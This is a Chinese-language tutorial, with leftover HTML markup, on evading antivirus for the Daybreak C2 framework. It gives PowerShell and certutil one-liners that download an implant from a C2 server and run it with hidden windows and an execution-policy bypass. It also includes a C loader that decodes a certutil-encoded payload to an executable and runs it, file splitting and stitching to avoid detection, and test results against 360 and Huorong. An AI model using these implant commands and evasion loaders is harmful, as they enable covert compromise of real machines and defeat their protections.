免杀学习-从指令绕过开始(1) 教学文档<\/h1>

1. 破晓工具简介<\/h2>
破晓(Daybreak)是一个类似Cobalt Strike(CS)的C2框架工具，具有以下特点：<\/p>
采用Web界面控制，简洁美观且自带中文支持<\/li>
集成多种操作系统上线功能（相比CS需要插件支持Linux上线）<\/li>
支持通过PowerShell和Certutil指令进行上线操作<\/li> <\/ul>
2. 基础上线命令分析<\/h2>

2.1 PowerShell上线命令<\/h3>
powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http:\/\/127.0.0.1:1338\/d\/pzxsnoqd'<\/span>,'pzxsnoqd.exe'<\/span>) && pzxsnoqd.exe agent -u http:<\/span>\/\/127.0.0.1:<\/span>1338 -s e75tdmwe
<\/span><\/span><\/code><\/pre>2.2 Certutil上线命令<\/h3>
certutil -urlcache -gmt -split -f http:\/\/127.0.0.1:1338\/d\/pzxsnoqd pzxsnoqd.exe && pzxsnoqd.exe agent -u http:\/\/127.0.0.1:1338 -s e75tdmwe
<\/span><\/span><\/code><\/pre>注意<\/strong>：破晓的上线操作需要利用探针参数（如示例中的e75tdmwe<\/code>）<\/p>
3. 初步测试结果<\/h2>
3.1 360环境下测试<\/h3>

静态免杀通过<\/li>
上线尝试被阻止<\/li>
<\/ul>
3.2 火绒环境下测试<\/h3>

静态云查杀通过<\/li>
上线尝试被阻止<\/li>
<\/ul>
3.3 文件分析结果<\/h3>

VirusTotal检测结果良好<\/li>
VirScan检测结果良好<\/li>
<\/ul>
4. 进阶免杀技术：Certutil加解密<\/h2>
4.1 加密方法<\/h3>
Certutil -encode C+Powershell.exe out.txt
<\/span><\/span><\/code><\/pre>4.2 C语言解密执行代码<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <iostream><\/span>
<\/span><\/span><\/span>#include<\/span> <fstream><\/span>
<\/span><\/span><\/span><\/span>using namespace std;
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>()
<\/span><\/span>{
<\/span><\/span>    char<\/span> automobie[50<\/span>];
<\/span><\/span>    ofstream outfile;
<\/span><\/span>    \/\/ 将解密的内容写入一个文件中
<\/span><\/span><\/span><\/span>    outfile.open("encryption.txt"<\/span>);
<\/span><\/span>    outfile.setf(ios_base::<\/span>showpoint);
<\/span><\/span>    outfile <<<\/span> "-----BEGIN CERTIFICATE-----<\/span>\n<\/span>"<\/span>
<\/span><\/span>        \/\/ C2文件加密的内容
<\/span><\/span><\/span><\/span>        "-----END CERTIFICATE-----<\/span>\n<\/span>"<\/span>
<\/span><\/span>            <<<\/span> endl;
<\/span><\/span>    outfile.close();
<\/span><\/span>    \/\/ 进行解密
<\/span><\/span><\/span><\/span>    system("Certutil -decode encryption.txt test.exe"<\/span>);
<\/span><\/span>    \/\/ 确保上述代码运行完成
<\/span><\/span><\/span><\/span>    Sleep(5000<\/span>);
<\/span><\/span>    system("test.exe C2执行参数"<\/span>);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.3 测试结果<\/h3>

火绒环境<\/strong>：成功产生解密文件和木马文件，但运行时出现告警<\/li>
360环境<\/strong>：成功上线，快速查杀未检测到<\/li>
<\/ul>
5. 高级技巧<\/h2>
5.1 文件切割与缝合（解决大文件问题）<\/h3>

使用Certutil加密生成大文本文件<\/li>
使用文本切割器（如https:\/\/uutool.cn\/txt-incise\/）按500行一份切割<\/li>
使用COPY命令缝合文件：<\/li>
<\/ol>
copy<\/span> 1.txt+2.txt+...+n.txt out.txt
<\/span><\/span><\/code><\/pre>
解密缝合后的文件：<\/li>
<\/ol>
certutil -decode out.txt test.exe
<\/span><\/span><\/code><\/pre>5.2 Windows文件执行冷知识<\/h3>
Windows命令行执行命令时判断的是文件头而非文件后缀，因此：<\/p>

可以将exe文件后缀改为jpg等格式仍可执行<\/li>
但不能直接在C代码中修改后缀后执行（会失败）<\/li>
<\/ul>
测试代码：<\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <iostream><\/span>
<\/span><\/span><\/span>#include<\/span> <fstream><\/span>
<\/span><\/span><\/span><\/span>using namespace std;
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>()
<\/span><\/span>{
<\/span><\/span>    char<\/span> automobie[50<\/span>];
<\/span><\/span>    ofstream outfile;
<\/span><\/span>    outfile.open("encryption.txt"<\/span>);
<\/span><\/span>    outfile.setf(ios_base::<\/span>showpoint);
<\/span><\/span>    outfile <<<\/span> "-----BEGIN CERTIFICATE-----<\/span>\n<\/span>"<\/span>
<\/span><\/span>    "-----END CERTIFICATE-----<\/span>\n<\/span>"<\/span>
<\/span><\/span>            <<<\/span> endl;
<\/span><\/span>    outfile.close();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. 关键注意事项<\/h2>

破晓工具需要正确的探针参数才能成功上线<\/li>
不同杀毒软件对相同技术的检测结果可能不同（如360和火绒的差异）<\/li>
大文件处理时需要考虑切割和缝合技术<\/li>
Windows执行文件时关注的是文件内容而非后缀名<\/li>
直接在代码中修改文件后缀并执行可能失败，需通过命令行操作<\/li>
<\/ol>
7. 总结<\/h2>
本教学文档介绍了从基础到进阶的免杀技术，重点包括：<\/p>

破晓C2工具的基本使用<\/li>
PowerShell和Certutil的上线方法<\/li>
利用Certutil加解密的免杀技术<\/li>
文件切割缝合的高级技巧<\/li>
Windows文件执行的冷知识<\/li>
<\/ul>
这些技术在实际渗透测试中可有效绕过部分杀毒软件的检测，但需注意不同环境下的表现差异。<\/p>